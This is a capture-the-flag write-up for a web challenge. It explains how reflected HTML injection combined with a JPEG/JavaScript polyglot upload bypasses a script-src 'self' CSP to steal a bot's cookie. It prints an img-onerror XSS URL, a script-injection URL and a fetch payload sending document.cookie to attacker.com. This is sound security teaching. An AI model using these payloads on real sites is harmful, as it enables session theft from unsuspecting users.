keyboard_arrow_up

title: Kara Jutsu Access
date: Dec 25, 2022
tags: Writeup YogoshaChristmas_2022 Web


Kara Jutsus Access

Difficulty: 500 points | 31 solves

Description: Well done accessing some important information! Now I heard that some kara members use the following website for a reason, can you retrieve Dr Amado cookie?


Table of content


🕵️ Recon

This challenge was the 4th step of the CTF. For this one, we had to find a way to get an XSS to get the bot's cookie. The website was a simple web application with a profile endpoint with a image file upload feature.

home.png

Home page


profile.png

Profile page


Trying to find a way to upload a .svg, .html... files leads to nothing as the file must be a valid PNG / JPEG file. So, we need to find another feature that could be used to get it.

Looking around, it is possible to find a chat that is vulnerable to unsanitized HTML injection:

http://54.82.54.16/index.php?name=a&email=a&subject=a&message=%3Cimg%20src=x%20onerror=alert()%3E&subcom=#

Unfortunately, the website is securised using the following CSP which allows only script to be load from the website domain.

<meta http-equiv="Content-Security-Policy" content=" script-src 'self'  ; object-src 'none' ; ">

Thus, to bypass this CSP, we have to find a way to upload a valid javascript file.


🤡 JFIF polyglote image

To archive the file upload explained above, we need to check 2 conditions:

Why do we need to have a valid MIME-Type? Because, if we try to load a resource with <script src="XX"> with an invalid MIME-Type, the browser will block his loading thanks to the CORB.


What is Cross-Origin Read Blocking (CORB)?

CORB is a Browser security that aims to mitigate side-channel attacks and ensure that protect sensitive resources from been loaded on a website.

To do so, it will restrict the MIME-Type that can be loaded depending on the context. For example, for <script src=""> the MIME-Type must be:

More details here: link.


Luckily for us, files are sent back to the client using the MIME-Type application/octet-stream. Thus, if we find a way to upload a valid PNG / Javascript file, we could bypass the CSP.

To do so, we can use this beautiful article: link. It explains how to create a Javascript / JPEG Polyglote which is exactly what we are looking for. I won't go deep into details for this part as @Medusa0xf did it well in his article. But, you can use the following small file that I create to reproduce the exploit:

Exploit file: link.


🎉 Flag

Changing the javascript payload by the bellow payload and using it as a script source and we can exfiltrate the bot's cookie!

fetch("http://attacker.com?cookie=".concat(document.cookie))
Javascript payload


Notice the charset="ISO-8859-1" attribute which is necessary to make the exploit works.

http://54.82.54.16/index.php?name=a&email=a&subject=a&message=<script charset="ISO-8859-1" src="<IMAGE-PATH>">&subcom=#
Link for the bot


Flag: flag=FLAG{K4ra_OnCe_Alw4y5_Kara????} 🎉


keyboard_arrow_left Kara Jutsu Platform

Forbidden Jutsu keyboard_arrow_right